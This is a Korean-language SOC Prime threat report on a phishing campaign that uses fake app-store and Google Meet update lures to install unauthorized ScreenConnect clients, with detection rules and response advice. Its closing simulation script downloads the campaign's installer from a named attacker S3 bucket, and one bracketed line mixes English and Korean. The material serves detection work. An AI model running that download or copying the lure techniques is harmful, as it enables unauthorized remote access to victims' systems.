SOC Prime Bias: 높음

11 Aug 2026 06:17 UTC

앱 스토어 테마를 활용한 피싱을 통한 ScreenConnect 대규모 확산

Author Photo
SOC Prime Team linkedin icon 팔로우
앱 스토어 테마를 활용한 피싱을 통한 ScreenConnect 대규모 확산
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

대규모 피싱 캠페인은 고급 사회 공학 기법을 사용하여 허가되지 않은 ConnectWise ScreenConnect 클라이언트를 배포합니다. 공격자는 동적 웹 콘텐츠와 사기성 업데이트 알림을 통해 Microsoft Store, Apple App Store 및 Google Meet과 같은 신뢰할 수 있는 서비스를 사칭합니다. 설치되면 RMM 소프트웨어는 위협 행위자들에게 손상된 시스템에 대한 지속적인 원격 액세스를 제공합니다.

조사

LevelBlue OpsCTI 팀은 가짜 업데이트 피싱 프레임워크와 재사용된 인프라의 분석을 통해 이 캠페인을 밝혀냈습니다. 연구원들은 일관된 디렉토리 구조, 반복되는 HTTP 리소스 해시 및 잠재적 피해자를 프로파일링하는 데 사용된 AI 지원 스크립트를 식별했습니다. 조사 과정에서 실시간 텔레메트리 및 감염 보고에 사용된 Telegram Bot API의 악용도 밝혀졌습니다.

완화 조치

조직은 허가되지 않은 RMM 소프트웨어를 감지하는 것을 우선시하고 Amazon S3 또는 Cloudflare R2와 같은 잘 알려지지 않은 퍼블릭 클라우드 서비스에서 실행 파일 다운로드를 모니터링해야 합니다. 브랜드 사칭과 허가되지 않은 Telegram Bot API 트래픽을 식별하기 위한 제어도 권장됩니다. 정기적인 엔드포인트 인벤토리 검토를 통해 불량 ScreenConnect 설치 및 기존 타협 상황을 발견할 수 있습니다.

대응

타협이 의심될 경우, 영향을 받은 시스템은 즉시 격리되어야 하며 허가되지 않은 릴레이 인스턴스와 통신하는 모든 ScreenConnect 클라이언트가 조사되어야 합니다. 네트워크 로그는 알려진 피싱 도메인 또는 퍼블릭 클라우드 저장소 엔드포인트로의 의심스러운 연결에 대해 검토되어야 합니다. msiexec.exe 또는 PowerShell로 외부 소스에서 파일을 다운로드하는 프로세스를 확인해야 합니다.

공격 흐름

탐지

숨겨진 PowerShell 명령줄을 통한 실행 가능성 (cmdline 경유)

SOC Prime 팀
2026년 8월 10일

PowerShell에서 수상한 .NET 메서드 호출 (powershell 경유)

SOC Prime 팀
2026년 8월 10일

비정상적인 디렉토리에서 파일을 실행하는 가능성 있는 Msiexec (cmdline 경유)

SOC Prime 팀
2026년 8월 10일

대체 원격 액세스/관리 소프트웨어 (process_creation 경유)

SOC Prime 팀
2026년 8월 10일

Cloudflare 개발 도메인 악용 가능성 (dns 경유)

SOC Prime 팀
2026년 8월 10일

비정상적인 최상위 도메인(TLD) DNS 요청에 의한 수상한 지휘 및 통제 (dns 경유)

SOC Prime 팀
2026년 8월 10일

감지를 위한 IOC (HashSha256): ‘가짜 업데이트’ 이상 – 애플리케이션 스토어 테마의 피싱에서 ScreenConnect의 대규모 배포까지

SOC Prime AI 규칙
2026년 8월 10일

감지를 위한 IOC (SourceIP): ‘가짜 업데이트’ 이상 – 애플리케이션 스토어 테마의 피싱에서 ScreenConnect의 대규모 배포까지

SOC Prime AI 규칙
2026년 8월 10일

감지를 위한 IOC (DestinationIP): ‘가짜 업데이트’ 이상 – 애플리케이션 스토어 테마의 피싱에서 ScreenConnect의 대규모 배포까지

SOC Prime AI 규칙
2026년 8월 10일

피싱을 통한 허가되지 않은 ScreenConnect 설치 실행 [Windows 프로세스 생성]

SOC Prime AI 규칙
2026년 8월 10일

수상한 S3 버킷에서 ScreenConnect 설치 프로그램 다운로드 탐지 [AWS Cloudtrail]

SOC Prime AI 규칙
2026년 8월 10일

시뮬레이션 실행

전제 조건: 텔레메트리 & 기준 사전 검사 통과 필수.

합리적 근거: 이 섹션은 탐지 규칙을 트리거하도록 설계된 적 대 기술(TTP)의 정밀한 실행을 상세히 설명합니다. 명령 및 서술은 식별된 TTP를 직접 반영해야 하며 탐지 논리에 예상되는 정확한 텔레메트리를 생성하는 것을 목표로 합니다. 추상적이거나 관련 없는 예는 오진으로 이어질 수 있습니다.

  • 공격 내러티브 및 명령: 공격자는 피싱 캠페인을 설립했습니다. 파일 기반 안티바이러스를 피하기 위해 합법적인 원격 액세스 도구(ScreenConnect)를 합법적인 소프트웨어 배포를 모방하는 퍼블릭 AWS S3 버킷에 호스팅합니다. 공격자는 희생자에게 설치 프로그램 다운로드를 지시합니다. GetObject AWS CloudTrail에서 특정 악의적인 버킷을 대상으로 한 이벤트를 트리거합니다 eobtdk.s3.us-east-2.amazonaws.com 및 특정 파일 이름 ScreenConnect.ClientSetup.msi.

  • 회귀 테스트 스크립트: [Note: Since we cannot interact with real malicious buckets, this script simulates the 요청 버킷이 존재했다면 로그 항목을 생성할 요청입니다.]

    #!/bin/bash
    # CloudTrail 탐지 규칙을 트리거하기 위한 시뮬레이션 스크립트
    # 도구 다운로드를 위해 공격자가 수행할 API 호출 모방
    
    echo "[+] 시뮬레이션 시작: 악의적인 S3에서 ScreenConnect 다운로드..."
    
    # AWS CLI를 사용하여 GET 요청을 시도합니다.
    # 버킷이 존재하지 않더라도 실제 환경에서는 '요청' 시도가 CloudTrail 이벤트를 생성합니다.
    
    aws s3 cp s3://eobtdk/ScreenConnect.ClientSetup.msi . --region us-east-2
    
    echo "[+] 시뮬레이션 명령 전송됨. 'eobtdk.s3.us-east-2.amazonaws.com'을 대상으로 하는 GetObject 이벤트를 확인하세요."
  • 정리 명령:

    # 시뮬레이션 중 다운로드된 파일 삭제
    rm -f ScreenConnect.ClientSetup.msi